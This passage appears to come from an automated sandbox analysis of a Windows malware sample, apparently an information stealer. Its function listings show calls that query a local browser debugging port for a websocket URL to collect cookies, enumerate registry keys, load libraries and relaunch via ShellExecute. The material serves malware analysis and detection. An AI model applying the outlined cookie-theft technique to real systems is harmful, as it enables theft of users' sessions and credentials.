                        • Opcode ID: d0ac37295b8a347a0f1fb99effb84720de4233bbe7313aec39d08e07434f3c1f
                        • Instruction ID: 5f8b699611df854adccd509e87036c39b5782d3dea1d16d68acb34c2bb376ccb
                        • Opcode Fuzzy Hash: d0ac37295b8a347a0f1fb99effb84720de4233bbe7313aec39d08e07434f3c1f
                        • Instruction Fuzzy Hash: 75B11471A102069BDB25FF75D9859AF77B5AF84309F40002EFC45AB312DB78EC458BA8
                        Function 004492B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004490C0: InternetOpenA.WININET(0046CFEC,00000001,00000000,00000000,00000000), ref: 004490DF
                          • Part of subcall function 004490C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004490FC
                          • Part of subcall function 004490C0: InternetCloseHandle.WININET(00000000), ref: 00449109
                        • strlen.MSVCRT ref: 004492E1
                        • strlen.MSVCRT ref: 004492FA
                          • Part of subcall function 00448980: std::_Xinvalid_argument.LIBCPMT ref: 00448996
                        • strlen.MSVCRT ref: 00449399
                        • strlen.MSVCRT ref: 004493E6
                        • lstrcat.KERNEL32(?,cookies), ref: 00449547
                        • lstrcat.KERNEL32(?,00471794), ref: 00449559
                        • lstrcat.KERNEL32(?,?), ref: 0044956A
                        • lstrcat.KERNEL32(?,00474B98), ref: 0044957C
                        • lstrcat.KERNEL32(?,?), ref: 0044958D
                        • lstrcat.KERNEL32(?,.txt), ref: 0044959F
                        • lstrlen.KERNEL32(?), ref: 004495B6
                        • lstrlen.KERNEL32(?), ref: 004495DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 00449614
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                        • API String ID: 1201316467-3542011879
                        • Opcode ID: 78daebb7d9ede21859dab446a2bcb4aa21ca364f6a251a5453359785861c8042
                        • Instruction ID: ac1ede7a359b854376a3baf2aefad08a65fc48954f87301bfcc7baf530a08102
                        • Opcode Fuzzy Hash: 78daebb7d9ede21859dab446a2bcb4aa21ca364f6a251a5453359785861c8042
                        • Instruction Fuzzy Hash: 3FE13971E10218EBEF14DFA8D980ADEBBB5BF48304F10446AE909A7341DB78AE45CF55
                        Function 0045D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 0045D9A1
                        • memset.MSVCRT ref: 0045D9B3
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045D9DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045DA0E
                        • lstrcat.KERNEL32(?,00000000), ref: 0045DA1C
                        • lstrcat.KERNEL32(?,0158E508), ref: 0045DA36
                        • lstrcat.KERNEL32(?,?), ref: 0045DA4A
                        • lstrcat.KERNEL32(?,0158D460), ref: 0045DA5E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045DA8E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0045DA95
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045DAFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2367105040-0
                        • Opcode ID: 183da4f70f735e2bc719b358ee78a4c25992fe0494addbac9df8ab5a3dfa10dc
                        • Instruction ID: 13ae8eb2e0264fc1b0608eb33432953e31ca0b61c58706ca2612278c2ad3d80a
                        • Opcode Fuzzy Hash: 183da4f70f735e2bc719b358ee78a4c25992fe0494addbac9df8ab5a3dfa10dc
                        • Instruction Fuzzy Hash: DEB1A271D102199FDB24EF74DC849EFB7B9AF48304F14456AF909A3351DA389E88CB64
                        Function 0044B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044B330
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B37E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B3A9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044B3B1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B3D9
                        • lstrlen.KERNEL32(00474C50), ref: 0044B450
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B474
                        • lstrcat.KERNEL32(00000000,00474C50), ref: 0044B480
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B4A9
                        • lstrlen.KERNEL32(00000000), ref: 0044B52D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B557
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044B55F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B587
                        • lstrlen.KERNEL32(00474AD4), ref: 0044B5FE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B622
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 0044B62E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B65E
                        • lstrlen.KERNEL32(?), ref: 0044B767
                        • lstrlen.KERNEL32(?), ref: 0044B776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B79E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: f4a19773d70ce341220c539de1bc9246eba4c2fbc230e16d219d1406f0c4389c
                        • Instruction ID: 629a887e51fe67aec3334fc778e903e3218ed4a7dc4b5b0b49812ce3610709bd
                        • Opcode Fuzzy Hash: f4a19773d70ce341220c539de1bc9246eba4c2fbc230e16d219d1406f0c4389c
                        • Instruction Fuzzy Hash: 0E026F30A012059FEB25DF65D989A6BB7F1EF44308F19806EE8099B361D779DC82CBD4
                        Function 00463760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        • RegOpenKeyExA.ADVAPI32(?,0158B6D8,00000000,00020019,?), ref: 004637BD
                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004637F7
                        • wsprintfA.USER32 ref: 00463822
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00463840
                        • RegCloseKey.ADVAPI32(?), ref: 0046384E
                        • RegCloseKey.ADVAPI32(?), ref: 00463858
                        • RegQueryValueExA.ADVAPI32(?,0158E178,00000000,000F003F,?,?), ref: 004638A1
                        • lstrlen.KERNEL32(?), ref: 004638B6
                        • RegQueryValueExA.ADVAPI32(?,0158E1F0,00000000,000F003F,?,00000400), ref: 00463927
                        • RegCloseKey.ADVAPI32(?), ref: 00463972
                        • RegCloseKey.ADVAPI32(?), ref: 00463989
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 13140697-3278919252
                        • Opcode ID: 8ad70563870b65e002eb883ee080bcbbcf3cd0a4c700299452ce589fa716aadb
                        • Instruction ID: d7a5c6fc1ebed38bc2b7f3e37cfe980e00ba34a739ac17d276362b170350bd64
                        • Opcode Fuzzy Hash: 8ad70563870b65e002eb883ee080bcbbcf3cd0a4c700299452ce589fa716aadb
                        • Instruction Fuzzy Hash: EA91BEB29002489FCB14DF94CD849EEB7B9FB48314F14816EE509A7311E739AE85CFA5
                        Function 004490C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenA.WININET(0046CFEC,00000001,00000000,00000000,00000000), ref: 004490DF
                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004490FC
                        • InternetCloseHandle.WININET(00000000), ref: 00449109
                        • InternetReadFile.WININET(?,?,?,00000000), ref: 00449166
                        • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00449197
                        • InternetCloseHandle.WININET(00000000), ref: 004491A2
                        • InternetCloseHandle.WININET(00000000), ref: 004491A9
                        • strlen.MSVCRT ref: 004491BA
                        • strlen.MSVCRT ref: 004491ED
                        • strlen.MSVCRT ref: 0044922E
                        • strlen.MSVCRT ref: 0044924C
                          • Part of subcall function 00448980: std::_Xinvalid_argument.LIBCPMT ref: 00448996
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                        • API String ID: 1530259920-2144369209
                        • Opcode ID: efdf98e0c5c32d3e40be0a79b0ec1f2fcb598a43e51e108aa1ee359e722af079
                        • Instruction ID: e3ef690ede61b08487c8e930c4e082f2fd3c05ca1b2e17d48f71de6d605d64af
                        • Opcode Fuzzy Hash: efdf98e0c5c32d3e40be0a79b0ec1f2fcb598a43e51e108aa1ee359e722af079
                        • Instruction Fuzzy Hash: A351E871640205ABE714DFA8DC45FEEF7F9DB48710F14416AF909E3280DBB8AD4487A9
                        Function 00461660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004616A1
                        • lstrcpy.KERNEL32(00000000,0157B860), ref: 004616CC
                        • lstrlen.KERNEL32(?), ref: 004616D9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004616F6
                        • lstrcat.KERNEL32(00000000,?), ref: 00461704
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0046172A
                        • lstrlen.KERNEL32(0158A620), ref: 0046173F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00461762
                        • lstrcat.KERNEL32(00000000,0158A620), ref: 0046176A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461792
                        • ShellExecuteEx.SHELL32(?), ref: 004617CD
                        • ExitProcess.KERNEL32 ref: 00461803
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                        • String ID: <
                        • API String ID: 3579039295-4251816714
                        • Opcode ID: 01cea721eb63318a8a8aa02da1de81b176db2a1fff685a34aa6ad4247bc703f2
                        • Instruction ID: 387ec38c57d168f4151db1c01fd1f04f6131ed1455694715f85f15da17bda9ab
                        • Opcode Fuzzy Hash: 01cea721eb63318a8a8aa02da1de81b176db2a1fff685a34aa6ad4247bc703f2
                        • Instruction Fuzzy Hash: 8F51B370A01219AFDB15DFB5CD84A9FB7FAAF48301F44412AF509E3361EB74AE418B64
                        Function 0045EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045EFE4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F012
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0045F026
                        • lstrlen.KERNEL32(00000000), ref: 0045F035
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 0045F053
                        • StrStrA.SHLWAPI(00000000,?), ref: 0045F081
                        • lstrlen.KERNEL32(?), ref: 0045F094
                        • lstrlen.KERNEL32(00000000), ref: 0045F0B2
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0045F0FF
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0045F13F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$AllocLocal
                        • String ID: ERROR
                        • API String ID: 1803462166-2861137601
                        • Opcode ID: c37099af99af76db4f1979232da8151625ba2c654f4bdf1cee71e1d658d7e948
                        • Instruction ID: 58568faf0fd5969d09221dfe33cbda0b15e2544e3a34ab09d879393ee044c322
                        • Opcode Fuzzy Hash: c37099af99af76db4f1979232da8151625ba2c654f4bdf1cee71e1d658d7e948
                        • Instruction Fuzzy Hash: B951BE31A101019FDB21AF75DC49AAFB7A5AF45705F04402EFC099B313DB78DC098BAA
                        Function 0044A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentVariableA.KERNEL32(01588F38,00679BD8,0000FFFF), ref: 0044A026
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044A053
                        • lstrlen.KERNEL32(00679BD8), ref: 0044A060
                        • lstrcpy.KERNEL32(00000000,00679BD8), ref: 0044A08A
                        • lstrlen.KERNEL32(00474C4C), ref: 0044A095
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044A0B2
                        • lstrcat.KERNEL32(00000000,00474C4C), ref: 0044A0BE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044A0E4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044A0EF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044A114
                        • SetEnvironmentVariableA.KERNEL32(01588F38,00000000), ref: 0044A12F
                        • LoadLibraryA.KERNEL32(0158D890), ref: 0044A143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                        • String ID:
                        • API String ID: 2929475105-0
                        • Opcode ID: b2519a4777dd56c78fd575e0956c8dd0366bc3ca208d2bd7005b1fdd4b8dfb3c
                        • Instruction ID: 51ecc4b1290d7d0bfcd9fe5dc34b1aef7861261c02e4fd68289484ec5ea3c976
                        • Opcode Fuzzy Hash: b2519a4777dd56c78fd575e0956c8dd0366bc3ca208d2bd7005b1fdd4b8dfb3c
                        • Instruction Fuzzy Hash: F691E3706806019FF7349FA4DC48A6737A6BB58704F40505AF80987362EFBDDC90CB9A
                        Function 0045C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045C8A2
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045C8D1
                        • lstrlen.KERNEL32(00000000), ref: 0045C8FC
